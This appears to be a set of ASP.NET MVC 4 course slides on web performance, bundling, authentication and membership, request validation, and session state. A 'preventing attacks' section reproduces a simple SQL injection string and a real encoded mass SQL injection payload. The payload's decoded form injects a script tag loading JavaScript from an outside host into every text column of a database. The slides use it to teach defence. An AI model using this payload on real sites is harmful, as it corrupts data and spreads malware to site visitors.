9. 22
Performance
4. Add an Expires or a Cache-Control Header
For static components
Implement a Never expire policy by setting far future Expires
header
Expires: Thu, 15 Apr 2090 20:00:00 GMT
A first-time visitor to your page may have to make several HTTP
requests, but by using the Expires header you make those
components cacheable
Remember to change the components filename whenever the
component changes, for example, yahoo_2.0.6.js
For dynamic components
Use an appropriate Cache-Control header to help the browser
with conditional requests
11
Performance
9. 23
5. Gzip Components
Web clients indicate support for compression with the
Accept-Encoding header in the HTTP request
Accept-Encoding: gzip, deflate
If the web server sees this header in the request, it
may compress the response using one of the methods
listed by the client
The web server notifies the web client of this via the ContentEncoding header in the response
Content-Encoding: gzip
Gzip is the most popular and effective compression
method at this time
Performance
9. 24
6. & 7. Put Stylesheets at the Top, Scripts at Bottom
Moving stylesheets to the document HEAD makes pages
appear to be loading faster
This is because putting stylesheets in the HEAD allows the page
to render progressively, so the header, the navigation bar, the
logo at the top, and so on all serve as visual feedback for the
user who is waiting for the page
The problem caused by scripts is that they block
parallel downloads
While a script is downloading the browser wont start any other
downloads
8. Avoid CSS Expressions
CSS expressions are a powerful (and dangerous) way to set CSS
properties dynamically; supported in Internet Explorer starting
with version 5, but were deprecated starting with IE8
12
Performance
9. 25
9. Make JavaScript and CSS External
Using external files generally produces faster pages
because the files are cached by the browser
JavaScript and CSS that are inlined in HTML documents get
downloaded every time the HTML document is requested
This reduces the number of HTTP requests that are needed, but
increases the size of the HTML document
On the other hand, if the JavaScript and CSS are in external
files cached by the browser, the size of the HTML document is
reduced without increasing the number of HTTP requests
The only exception where inlining is preferable is with home
pages because home pages that have few (perhaps only one)
page view per session may find that inlining JavaScript and CSS
results in faster end-user response times
Performance
9. 26
11. Minify JavaScript and CSS
Minification is the practice of removing unnecessary
characters from code to reduce its size thereby
improving load times
When code is minified all comments are removed, as well as
unneeded white space characters (space, newline, and tab)
Even if you gzip your scripts and styles, minifying them will still
reduce the size by 5% or more
13
Performance
9. 27
12. Avoid Redirects
One of the most wasteful redirects happens frequently
and web developers are generally not aware of it
It occurs when a trailing slash (/) is missing from a URL
For example, going to http://astrology.yahoo.com/astrology
results in a 301 response containing a redirect to
http://astrology.yahoo.com/astrology/
Performance
9. 28
Split Components Across Domains
Splitting components allows you to maximize parallel
downloads
Make sure youre using not more than 2-4 domains because of
the DNS lookup penalty
For example, you can host your HTML and dynamic content on
www.example.org and split static components between
static1.example.org and static2.example.org
Performance Research, Part 4: Maximizing Parallel Downloads in the Carpool Lane
http://yuiblog.com/blog/2007/04/11/performance-research-part-4/
14
10. 1
Module 10
Using JavaScript and jQuery for
Responsive MVC 4 Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
10. 2
Using JavaScript and jQuery for Responsive MVC 4 Web Applications
Contents
Exam Topic: Design and implement UI behavior
Implement client validation
Use JavaScript and the DOM to control application behavior
Extend objects by using prototypal inheritance
Implement the UI by using JQuery
Exam Topic: Reduce network bandwidth
Bundle and minify scripts (CSS and JavaScript)
Compress and decompress data (using gzip/deflate; storage)
Plan a content delivery network (CDN) strategy, for example, Windows Azure CDN
From the 20480 HTML5 course review the following
20480.03.JavaScript
20480.05.Ajax
20480.07.Objects
20480.C.Cross.Domain.Requests
10. 3
Optimization
Bundling, Minification, and Compression
Bundling
Combining multiple files into a single request
Minification
Stripping whitespace and comments and unused functions and
using shorter variable and parameter names
(function(){console.log(10)})()
Compression
(function () { // firebrand
var apples = 10;
function neverUsed() {
console.log("never used");
}
console.log(apples);
})();
Compressing files on the web server and decompressing them on
the browser to reduce bandwidth requirements
a.html (120kb) a.gzip (30kb)
Optimization
10. 4
Bundling and Minification
Bundling and minification are two techniques you can
use in ASP.NET 4.5 to improve request load time
Improves load time by reducing the number of requests to the
server and reducing the size of requested assets
Use bundling instead of embedding resources in a DLL
Minification is disabled when debug is true
Unless BundleTable.EnableOptimizations is true in Global.asax
{version} is used to automatically create a bundle with
the latest version of jQuery in your Scripts folder
public static void RegisterBundles(BundleCollection bundles) {
bundles.Add(new ScriptBundle("~/bundles/jquery").Include(
"~/Scripts/jquery-{version}.js"));
Bundling and Minification
http://www.asp.net/mvc/tutorials/mvc-4/bundling-and-minification
Optimization
10. 5
Bundling and Minification
Debug mode
<compilation debug="true" />
<script src="/Scripts/bootstrap.js"></script>
<script src="/Scripts/respond.js"></script>
Release mode
<compilation debug="false" />
<script src="/bundles/bootstrap?v=2Fz3B0iizV2NnnamQFrxNbYJNTFeBJ2GM05SilbtQU1"></script>
Note: the hash/digest used will automatically change if any file
in the bundle (or its minified version!) changes
ASP.NET will automatically minify your files if you have
not created a .min. version (but see next slide!)
Optimization
10. 6
Minification Changes
As well as stripping whitespace and comments,
minification would change this
function StartController($scope, $location, $rootScope) { }
To this
function StartController(n, t, i) { }
When using AngularJs, for dependency injection to
work, the argument names must not be changed
This isnt something you can change on the built in bundle
types, [] write your own IBundleTransform - Microsoft
public class CustomTransform : IBundleTransform {
public void process(BundleContext context, BundleResponse response) {
System.Web.Optimization making function argument names stay the same for certain functions
http://stackoverflow.com/questions/13032721/system-web-optimization-making-function-argument-names-stay-the-same-for-certain
10. 7
Optimization
HTTP Compression
To enable gzip compression in .config for IIS
<system.webServer>
<httpCompression
directory="%SystemDrive%\inetpub\temp\IIS Temporary Compressed Files">
<scheme name="gzip" dll="%Windir%\system32\inetsrv\gzip.dll"/>
<dynamicTypes>
<add mimeType="text/*" enabled="true"/>
<add mimeType="message/*" enabled="true"/>
<add mimeType="application/javascript" enabled="true"/>
<add mimeType="*/*" enabled="false"/>
</dynamicTypes>
<staticTypes>
<add mimeType="text/*" enabled="true"/>
<add mimeType="message/*" enabled="true"/>
<add mimeType="application/javascript" enabled="true"/>
<add mimeType="*/*" enabled="false"/>
</staticTypes>
</httpCompression>
<urlCompression doStaticCompression="true" doDynamicCompression="true"/>
</system.webServer>
HTTP Compression <httpCompression>
http://www.iis.net/configreference/system.webserver/httpcompression
10. 8
Optimization
HTTP Compression
What is gzip compression ratio?
It depends!
File
Compressed Size / Ratio
1Gb file full for zeros
~120kb
Image files in a format that is compressed
natively (gif, jpg, png, and so on)
Little or no compression
Binary files like program executables (exe)
~2:1 compression
Plain text, HTML or other markup
3:1 or 4:1 or more
11. 1
Module 11
Controlling Access to ASP.NET
MVC 4 Web Application
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Controlling Access to ASP.NET MVC 4 Web Application
11. 2
Contents
Topic
Slide
Authentication
Authorization
Forms Auth.
ASP.NET Membership
Impersonation
22
WIF and ACS
23
Custom Security
25
Misc
28
Exam Topic: Configure and apply authorization
Create roles
Authorize roles by using configuration
Authorize roles programmatically
Create custom role providers
Implement WCF service authorization
Exam Topic: Implement a secure site with ASP.NET
Secure communication by applying SSL certificates
Salt and hash passwords for storage
Exam Topic: Design and implement claims-based
authentication across federated identity stores
Implement federated authentication by using
Windows Azure Access Control Service
Create a custom security token by using Windows
Identity Foundation
Handle token formats (for example, oAuth, OpenID,
LiveID, and Facebook) for SAML and SWT tokens
Exam Topic: Configure authentication
Authenticate users
Enforce authentication settings
Choose between Windows, Forms,
and custom authentication
Manage user session by using cookies
Configure membership providers
Create custom membership providers
11. 3
Authentication
ASP.NET and IIS Authentication Combinations
Authentication is set with a combination of settings in
IIS .config and ASP.NET Web.config
IIS Authentication on
ASP.NET authentication off
Basic
Non-IE, prompts for
Windows accounts
mode="Windows"
Digest
Non-IE, prompts for
Windows account
<authentication mode="Windows" />
Windows
Integrated
IE/Firefox auto-login
NTLM, Kerberos
Use Windows for intranet sites
where users have a Windows account
IIS Authentication off
ASP.NET authentication on
Anonymous
mode="Forms"
Use a MembershipProvider
mode="None"
Federated/claims-based
mode="Passport"
Pay Microsoft
IUSR_computername
Use Forms for internet sites
where users are stored in a
Membership provider or claims
<authentication mode="Forms" />
Authorization
11. 4
MVC Authorizing
To ensure users are authenticated
Anonymous users will be redirected to login view
[Authorize]
public ActionResult Create() {
To authorize by user and role or Windows group
String values depend on Windows or Forms authentication
[Authorize(Users="Mary,Omar", Roles="Admin")]
public ActionResult Create() {
When authenticated we can authorize by user and role
if (User.Identity.Name == "Fred") {
return View("SpecialViewForFred");
} else {
return View();
if (User.IsInRole("Sales"))
}
return View("SpecialViewForSales");
11. 5
Authorization
MVC Authorizing
If you apply Authorize to a whole class, you can still
allow anonymous for individual actions
[Authorize] // require all requests to authenticate
public class ProductController : Controller {
[AllowAnonymous] // disable authentication for this action
public ActionResult Index()
{
}
public ActionResult Display() // inherit from controller
{
}
[Authorize(Users="Mary,Omar", Roles="Admin")]
public ActionResult Edit()
{
}
}
11. 6
Authorization
Finding Out About the Current User
HttpContext.User returns an IPrincipal object
IsInRole(string)
Identity
if (User.IsInRole("Sales"))
Identity property implements IIdentity interface
AuthenticationType (NTLM, custom, and so on)
IsAuthenticated (true/false)
Name
if (User.Identity.Name == "Fred")
Could also use Roles class in System.Web.Security
using System.Web.Security;
if (Roles.IsUserInRole("John", "HR"))
Forms Authentication
11. 7
Configuring
Defaults for strings are shown, others are underlined
<system.web>
Cookie name
<authentication mode="Forms">
<forms name=".ASPXAUTH"
Change to MVC routes
loginUrl="login.aspx"
defaultUrl="default.aspx"
protection="[All|None|Encryption|Validation]"
timeout="30"
minutes
If true you must configure SSL certificate in IIS
path="/"
requireSSL="[true|false]"
slidingExpiration="[true|false]"
enableCrossAppRedirects="[true|false]"
cookieless="[UseUri|true|UseCookies|false|AutoDetect|UseDeviceProfile]"
domain=""
ticketCompatibilityMode="[Framework20|Framework40]">
<credentials>
<user name="Bob" password="secret"/>
</credentials>
forms Element for authentication (ASP.NET Settings Schema)
http://msdn.microsoft.com/en-us/library/vstudio/1d3t3c61(v=vs.100).aspx
Forms Authentication
11. 8
FormsAuthentication Properties
Static read-only properties (set in .config)
IsEnabled, FormsCookieName, FormsCookiePath, RequireSSL,
SlidingExpiration, CookieDomain, CookieMode, DefaultUrl,
LoginUrl, Timeout
Methods
SetAuthCookie, GetAuthCookie: Creates an authentication
ticket for the supplied user name and adds it to the cookies
collection of the response
Encrypt, Decrypt: Creates a string containing an encrypted
forms-authentication ticket suitable for use in an HTTP cookie
RedirectFromLoginUrl, GetRedirectUrl: Redirects user back to
the originally requested URL or the default URL
SignOut: Removes the forms-authentication ticket from browser
FormsAuthentication Class
http://msdn.microsoft.com/en-us/library/system.web.security.formsauthentication.aspx
ASP.NET Membership
11. 9
Providers
SqlMembershipProvider in .NET 2.0 and later
Uses fixed schema for users and roles (aspnetdb.mdf by default)
Focused on traditional membership (user has a username and a
password), in OAuth/OpenID the user doesnt have a password
SimpleMembershipProvider in .NET 4.5 and later
Designed as a replacement for the previous ASP.NET Role and
Membership provider system
The ASP.NET MVC 4 Internet application template
AccountController requires SimpleMembership and is not
compatible with previous MembershipProviders
You can continue to use existing ASP.NET Role and Membership
providers in ASP.NET 4.5 and ASP.NET MVC 4 - just not with the
ASP.NET MVC 4 AccountController
SimpleMembership, Membership Providers, Universal Providers
http://weblogs.asp.net/jgalloway/archive/2012/08/29/simplemembership-membership-providers-universal-providers-and-the-new-asp-net-4-5-web-forms-and-asp-net-mvc-4-templates.aspx
ASP.NET Membership
11. 10
SimpleMembershipProvider
SimpleRoleProvider simply implements the
RoleProvider abstract base class (from .NET 2.0) and
does not add anything more
ExtendedMembershipProvider abstract class inherits
from the core MembershipProvider abstract base class
Also added a new WebSecurity class which provides a nice
faade to SimpleMembershipProvider
You might have a users table and want to
integrate it with SimpleMembership
SimpleMembership requires that there are two columns on your
users table an ID column and a username column, but
they can be named whatever you want
Using SimpleMembership With ASP.NET WebPages
http://blog.osbornm.com/2010/07/21/using-simplemembership-with-asp.net-webpages
ASP.NET Membership
11. 11
SimpleMembershipProvider
Now that we have created our users table we need to
wire it up to SimpleMembership so that
SimpleMembership knows what columns to use
Parameters of WebSecurity.InitializeDatabaseFile are
name of the database file
name of the table you are using for the users table
name of the column being used for the ID
name of the column you are using for the username
WebSecurity.InitializeDatabaseFile(
"SecurityDemo.sdf", "Users", "UserID", "Username", true);
Last parameter indicates if the table should be automatically
created
ASP.NET Membership
11. 12
SimpleMembershipProvider
To create a register view
Where the anonymous object represents the extra columns in
your users table
WebSecurity.CreateUserAndAccount(username, password, new {
FirstName = fname, LastName = lname, Email = email,
StartDate = DateTime.Now, Bio = bio});
To create a login view
if (WebSecurity.Login(username, password)) {
var returnUrl = Request.QueryString["ReturnUrl"];
if(returnUrl.IsEmpty()) {
Response.Redirect(~/Account/Profile);
} else {
Response.Redirect(returnUrl);
}
}
11. 13
ASP.NET Membership
Table Schemas
SqlMembershipProvider
Universal Providers
ASP.NET Membership
11. 14
ASP.NET MVC 4 Basic template
The Basic template has configuration in place to use
ASP.NET Membership with the Universal Providers
<profile defaultProvider="DefaultProfileProvider">
<providers>
<add name="DefaultProfileProvider" type="System.Web.Providers.DefaultProfileProvider, System.Web.Providers,
..., PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection" applicationName="/" />
</providers>
</profile>
<membership defaultProvider="DefaultMembershipProvider">
<providers>
<add name="DefaultMembershipProvider" type="System.Web.Providers.DefaultMembershipProvider,
System.Web.Providers, ..., PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection"
enablePasswordRetrieval="false" enablePasswordReset="true" requiresQuestionAndAnswer="false"
requiresUniqueEmail="false" maxInvalidPasswordAttempts="5" minRequiredPasswordLength="6"
minRequiredNonalphanumericCharacters="0" passwordAttemptWindow="10" applicationName="/" />
</providers>
</membership>
<roleManager defaultProvider="DefaultRoleProvider">
<providers>
<add name="DefaultRoleProvider" type="System.Web.Providers.DefaultRoleProvider, System.Web.Providers, ...,
PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection" applicationName="/" />
</providers>
</roleManager>
<sessionState mode="InProc" customProvider="DefaultSessionProvider">
<providers>
<add name="DefaultSessionProvider" type="System.Web.Providers.DefaultSessionStateProvider,
System.Web.Providers, ..., PublicKeyToken=31bf3856ad364e35" connectionStringName="DefaultConnection" />
</providers>
</sessionState>
ASP.NET Membership
11. 15
ASP.NET MVC 4 Internet template
The Internet template uses
SimpleMembership
\Models\AccountModels.cs defines a user account
and includes annotations to define keys and such
\Filters\InitializeSimpleMembershipAttribute.cs
creates the membership database, then calls
WebSecurity.InitializeDatabaseConnection which
verifies that the underlying tables are in place
and marks initialization as complete (for the
applications lifetime)
\Controllers\AccountController.cs makes heavy
use of OAuthWebSecurity (for OAuth account
registration / login / management) and
WebSecurity (WebSecurity provides account
management services for ASP.NET MVC)
ASP.NET Membership
11. 16
WebSecurity Class (SimpleMembershipProvider)
CurrentUserName
Gets the user name for the current user
ChangePassword
Changes the password for the specified user
ConfirmAccount(String)
Confirms that an account is valid and activates the
account
CreateAccount
Creates a new membership account using the specified
user name and password and optionally lets you specify
that the user must explicitly confirm the account
CreateUserAndAccount
Creates a new user profile entry and a new membership
account
GeneratePassword
ResetToken
Generates a password reset token that can be sent to a
user in email
Login/Logout
Logs the user in/out
RequireRoles
If the current user is not in all of the specified roles, sets
the HTTP status code to 401 (Unauthorized)
ResetPassword
Resets a password by using a password reset token
WebSecurity Class
http://msdn.microsoft.com/en-us/library/webmatrix.webdata.websecurity(v=vs.111).aspx
11. 17
ASP.NET Membership
Roles Class Methods
AddUserToRole
AddUserToRoles
AddUsersToRole
AddUsersToRoles
Adds user(s) to role(s)
CreateNewRole
Creates a new role
DeleteRole
Deletes an existing role
FindUsersInRole
Returns a collection of users in a role
GetAllRoles
Returns a collection of all roles that currently exist
GetRolesForUser
Returns a collection of roles for the current user
IsUserInRole
Returns true if the user is a member of a specified role
RemoveUserFromRole
RemoveUserFromRoles
RemoveUsersFromRole
RemoveUsersFromRoles
Removes user(s) from role(s)
11. 18
ASP.NET Membership
Membership Methods (SqlMembershipProvider)
CreateUser
Add a user to the database
DeleteUser
Delete a user from the database
FindUserByEmail
FindUserByName
Gets a collection of membership users for whom the email addresses contain the specified e-mail addresses
or user names to match
GeneratePassword
Creates a random password of the specified length
GetAllUsers
Returns a collection of all users in the database
GetNumberOfUsersOnline Returns the number of users currently logged on
GetUser
Returns a MembershipUser object representing the
current logged-on user
GetUserByEmail
Gets a user name for which the e-mail address for the
user matches the specified email address
UpdateUser
Updates the database with any changed values
ValidateUser
Verifies that the user name and password are valid
using System.Web.Security;
if (Membership.ValidateUser("Fred", "secret"))
ASP.NET Membership
11. 19
Storing User Accounts in .Config
Credentials can be stored in the Web.config file as
Password formats: Clear text, MD5, or SHA1
<forms>
<credentials passwordFormat="SHA1">
<user name="Eric" password="07B7..."/>
<user name="Sam" password="5753..."/>
Use the classes in System.Security.Cryptography
namespace to generate the hash
Or call the 2nd longest method in .NET
string passwordHashed =
FormsAuthentication.HashPasswordForStoringInConfigFile(pwd, "SHA1");
Longest is:
GetTextEffectCharacterIndexFromTextSourceCharacterIndex
11. 20
Impersonation
ASP.NET accesses resources using a specific account
Network Service (IIS 6.0), ApplicationPoolIdentity (IIS 7+)
The setting is configurable by
Explicitly define an identity to impersonate
Use IIS-authenticated account (browser user account unless
IIS enables anonymous then it will be IUSR_computername)
<identity impersonate="true" />
Or use a named account
<identity impersonate="true"
userName="DOMAIN\username"
password="password" />
10
WIF and ACS
11. 21
What are They?
What is Windows Identity Foundation?
WIF enables .NET developers to externalize identity logic from
their application, improving developer productivity, enhancing
application security, and enabling interoperability
What is Windows Azure Access Control Service?
ACS is a cloud-based service that provides an easy way to
authenticate and authorize users to gain access to your web
applications and services while allowing authentication and
authorization to be factored out of your code
WIF and ACS
11. 22
Types Used
IClaimsIdentity
Extends the IIdentity interface to incorporate functionality
needed to implement claims-based identity e.g. Claims property
ClaimTypes class and its static properties
Use the ClaimTypes class (not an enum!) to search for a
particular type of claim in a ClaimSet or to create a claim
ClaimTypes.DateOfBirth, ClaimTypes.Email, and so on
if (claim.ClaimType == ClaimTypes.NameIdentifier) {
var identifier = claim.Value;
if (claim.ClaimType == "http://schemas.microsoft.com/...") {
var provider = claim.Value;
Claim Class
http://msdn.microsoft.com/en-us/library/system.identitymodel.claims.claim.aspx
IClaimsIdentity Interface
http://msdn.microsoft.com/en-us/library/microsoft.identitymodel.claims.iclaimsidentity.aspx
11
Custom Security
11. 23
Using HttpModules
An HTTP module is an assembly that is called on every
request that is made to your application
Can examine incoming requests and take action, so can perform
custom authentication or other security checks
Compare to HTTP handlers which are only called for registered
file extensions
Might implement one for mixed security authentication
e.g. Windows user but custom role
Custom Security
11. 24
Implementing Custom SimpleProviders
You can customize the new simple membership
provider by extending two abstract classes
WebMatrix.WebData.ExtendedMembershipProvider, and the
standard System.Web.Security.RoleProvider which was moved
to the System.Web.ApplicationServices.dll assembly
LLBLGen generates one DAL that supports a dozen or more
database providers out-of-the-box
dotConnect for Oracle implements SimpleMembership
functionality as custom OracleExtendedMembershipProvider and
OracleExtendedRoleProvider classes
SimpleMembershipProvider in MVC4 for MySql, Oracle, and more with LLBLGen
http://www.mattjcowan.com/funcoding/2012/11/10/simplemembershipprovider-in-mvc4-for-mysql-oracle-and-more-with-llblgen/
SimpleMembership and SimpleRole Providers for Oracle in ASP.NET MVC 4 Application Tutorial
http://www.devart.com/dotconnect/oracle/articles/extendedmembership-tutorial.html
12
Custom Security
11. 25
ClaimsAuthorizationManager
.NET 4.5 ships with a claims-based authorization
infrastructure around the ClaimsAuthorizationManager
class
Claims-based authorization encourages you to have a clean
separation of business and authorization code and thats much
better than sprinkling role checks all over your code base
but the API is not very approachable, especially in the face of
modern application development like MVC or Web API
All the base APIs in .NET 4.5 allow using claims-based
authorization, you just have to write your own plumbing
Thinktecture.IdentityModel contains an authorization filter
called ClaimsAuthorizeAttribute to make the connection to
ClaimsAuthorizationManager (see link below for details)
Using Claims-based Authorization in MVC and Web API
http://leastprivilege.com/2012/10/26/using-claims-based-authorization-in-mvc-and-web-api/
Miscellaneous
11. 26
Passwords
A study to find the top 25 leaked passwords of 2012 has
revealed too many people are still using password,
123456 and 12345678 for their login credentials
The average Web user maintains 25 separate accounts
but uses just 6.5 passwords to protect them, according
to a landmark study (PDF) from 2007
A PC running a single AMD Radeon HD7970 GPU can try
on average an astounding 8.2 billion password
combinations each second
Why passwords have never been weakerand crackers have never been stronger
http://arstechnica.com/security/2012/08/passwords-under-assault/
How I became a password cracker
http://arstechnica.com/security/2013/03/how-i-became-a-password-cracker/
13
12. 1
Module 12
Building a Resilient ASP.NET
MVC 4 Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Building a Resilient ASP.NET MVC 4 Web Applications
12. 2
Contents
Topic
Slide
Preventing Attacks
State Management
Exam Topic: Configure state management
Choose a state management mechanism (in-process and
out of process state management, ViewState)
Plan for scalability
Use cookies or local storage to maintain state
Apply configuration settings in web.config file
Implement sessionless state (for example, QueryString)
Exam Topic: Implement a secure site with ASP.NET
Use HTML encoding to prevent cross-site scripting attacks (ANTI-XSS Library)
Implement deferred validation and handle unvalidated requests, for example,
form, querystring, and URL
Prevent SQL injection attacks by parameterizing queries
Prevent cross-site request forgeries (XSRF)
Exam Topic: Manage data integrity
Apply encryption to application data
Apply encryption to the configuration sections of an application
Sign application data to prevent tampering
Preventing Attacks
12. 3
SQL Injection
Exploits of a Mom
http://xkcd.com/327/
Preventing Attacks
12. 4
SQL Injection
In which malicious code is inserted into strings that are
passed to an SQL database for parsing and execution
For example, this bad code reads a value posted from a web
form and concatenates it into a SQL statement
var city = Request.Form["ShipCity"];
var sql = "select * from OrdersTable where ShipCity = '" + city + "'";
A malicious user could enter the following in ShipCity textbox
Redmond'; drop table OrdersTable--
Reject the following characters: ' ; -- /* */ xp_
BUT much better to use parameters instead
SQL Injection
http://msdn.microsoft.com/en-us/library/ms161953.aspx
12. 5
Preventing Attacks
What Does This Do?
script.asp?var=random';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C00410052004500200040005400200
07600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290
020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F00520
0200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D00650020006600720
06F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E0073002000620
0200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E007800740079007000650
03D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E007800740
07900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780
074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F007200200
04600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F0
07200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F00530
0540041005400550053003D0030002900200042004500470049004E002000650078006500630028002700750070006400610074006500200
05B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280
063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270
027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E0069006800610
06F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E002700270027002900460
0450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F00720
0200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0
043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F00430075007200730
06F007200%20AS%20NVARCHAR(4000));EXEC(@S);--
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name
from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set
['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script
src=http://www.nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor
Encoded SQL Injection
SQL Injection
http://www.gutizz.com/encoded-sql-injection/
http://www.blackhatlibrary.net/SQL_injection
Preventing Attacks
12. 6
MVCs Anti-Forgery Token support
Writes a unique value to an HTTP-only cookie and then the same
value is written to the form
When the page is submitted, an error is raised if the cookie
value doesn't match the form value
This prevents cross site request forgeries, that is, a form from
another site that posts to your site in an attempt to submit
hidden content using an authenticated user's credentials
The feature doesnt prevent any other type of data forgery or
tampering based attacks
To use it perform two steps
1. Decorate the action method (or controller) with the
[ValidateAntiForgeryToken] attribute
2. Call the HtmlHelper method @Html.AntiForgeryToken() inside
the form in your view
Prevent Cross-Site Request Forgery (CSRF) using ASP.NET MVCs AntiForgeryToken() helper
http://blog.stevensanderson.com/2008/09/01/prevent-cross-site-request-forgery-csrf-using-aspnet-mvcs-antiforgerytoken-helper/
Preventing Attacks
12. 7
Requiring HTTPS
Use the RequireHttpsAttribute to prevent unsecured
HTTP requests from being sent to an action method
[RequireHttps] // applies to all actions in controller
public class SomeController
{
[RequireHttps] // applies to this action only
public ActionResult SomeAction()
ASP.NET Development Server doesnt support HTTPS
Conditional compilation can help
#if !DEBUG
[RequireHttps] // applies to all actions in controller
#endif
public class SomeController
ASP.NET MVC RequireHttps in Production Only
http://stackoverflow.com/questions/1639707/asp-net-mvc-requirehttps-in-production-only
State Management
12. 8
Reading and Writing Cookies
Check if a cookie exists and display it if it does
@if (Request.Cookies["lastVisit"] != null) {
@Request.Cookies["lastVisit"].Value
} else {
@:No cookie with last visit
}
Define the cookie for the next visit
Expires makes cookie get stored in a file instead of memory
Response.Cookies["lastVisit"].Value = DateTime.Now.ToString();
Response.Cookies["lastVisit"].Expires = DateTime.Now.AddDays(1);
State Management
12. 9
Controlling Cookie Scope
Cookie scope can prevent vulnerabilities in browsers
from being exploited by hackers to trick the browser to
send your cookie to other web sites
Cookie scope can be
Limited to a specific folder using the Path property
Response.Cookies["lastVisit"].Path = "/Application1";
Expanded to any server in a domain using the Domain property
Response.Cookies["lastVisit"].Domain = "contoso.com";
State Management
12. 10
Storing Multiple Values in a Cookie
Maximum 4 KB per cookie, 20 cookies per site
Could store multiple values in a single cookie
Response.Cookies["info"]["firstName"] = "Tony";
Response.Cookies["info"]["border"] = "blue";
Response.Cookies["info"].Expires = DateTime.Now.AddDays(1);
(firstName=Tony) (border=blue)
Cookie data can be manually encrypted before being
stored
State Management
12. 11
Query Strings
Typical query string in URL
http://search.microsoft.com/results?mkt=en-US&q=hello+world
How to read the values
var s1 = Request.QueryString["mkt"];
var s2 = Request.QueryString["q"];
State Management
12. 12
Request Validation
ASP.NET validates requests for potentially dangerous
values (like JavaScript) automatically
Throws HttpRequestValidationException if it finds problem
The algorithm it uses is not documented for obvious reasons
If you want to disable this feature for an action
[ValidateInput(false)] public ActionResult Edit()
You must also switch mode to the old 2.0 version
The default of 4.0 means it cannot be disabled!
<httpRuntime requestValidationMode="2.0" />
Any numeric value smaller than 4.0 (for example, 3.7, 2.9, or 2.0) is interpreted as 2.0
Any number larger than 4.0 is interpreted as 4.0
HttpRuntimeSection.RequestValidationMode Property
http://msdn.microsoft.com/en-us/library/system.web.configuration.httpruntimesection.requestvalidationmode(v=vs.110).aspx
State Management
12. 13
HttpRequest.Unvalidated
To disable request validation for a specific field in a
request (for example, for an input element or query
string value), check Request.Unvalidated when you get
the item
var rawComment = Request.Unvalidated.Form["comment"];
If you disable request validation, you must manually
check the unvalidated user input for potentially
dangerous input
Request Validation in ASP.NET
http://msdn.microsoft.com/en-us/library/hh882339(v=vs.110).aspx
HttpRequest.Unvalidated Property
http://msdn.microsoft.com/en-us/library/system.web.unvalidatedrequestvalues.aspx
State Management
12. 14
Application State
Application state is shared and used to store
information that is not user-specific
An instance of the HttpApplicationState class
Lock to prevent another page from changing the
variable between the time that the process reads the
current value and the time it writes it
HttpContext.Application.Lock();
HttpContext.Application["PageRequestCount"] =
(int)(HttpContext.Application["PageRequestCount"]) + 1;
HttpContext.Application.UnLock();
Stays until explicitly removed or application ends
Better to use Cache which can adjust to low-memory conditions
State Management
12. 15
Responding to Application Events
Handle in a Global.asax file
Application_Start
Application is starting; use to initialize application variables
Application_End
Application is ending; use to free application resources
Application_Error
An unhandled error has occurred
Application_LogRequest
A request has been made; use to log information about requests
Other events include
PostLogRequest, BeginRequest, ResolveCacheRequest
State Management
12. 16
Configuring Cookieless Session State
A cookieless session enables ASP.NET to track sessions
using a query string in the URL instead of a cookie
<sessionState cookieless="true"
regenerateExpiredSessionId="true" />
Embedded after the slash following the application name
http://www.example.com/s(lit3py55t21...)/order
Cookieless (UseCookies is default; required for AJAX)
False or UseCookies: uses cookies
True or UseUri: uses URI
UseDeviceProfile: decides based on browser definition support
AutoDetect: equivalent to UseDeviceProfile; does not use
probing mechanism
12. 17
State Management
Responding to Session Events
Session_Start
Raised when a new session begins
Use to initialize session variables
Session_End
Raised when a session is abandoned or expires
but only when using InProc session mode
Use to free per-session resources
Default timeout is 20 minutes
To change it to five minutes
<sessionState timeout="5" />
Session.Timeout = 5;
12. 18
State Management
Choosing a Session State Mode
InProc (default)
Stores session state in the AppDomain of web site
Fastest mode and can store any type
StateServer
Stores session state in memory of a service called the ASP.NET
State Service; could be on same web server or another machine
Type must be serializable
SQLServer
Stores session state in a SQL Server database; session state must
be enabled on the database; type must be serializable
Slowest mode, but most recoverable
Custom, Off
<system.web>
<sessionState mode="Off" />
12. 19
State Management
Configuring Session State Modes
Configure to use SQL Server
Session timeout in minutes
<sessionState mode="SQLServer" timeout="20"
sqlConnectionString="Data Source=.;Integrated Security=SSPI;"
sqlCommandTimeout="30" />
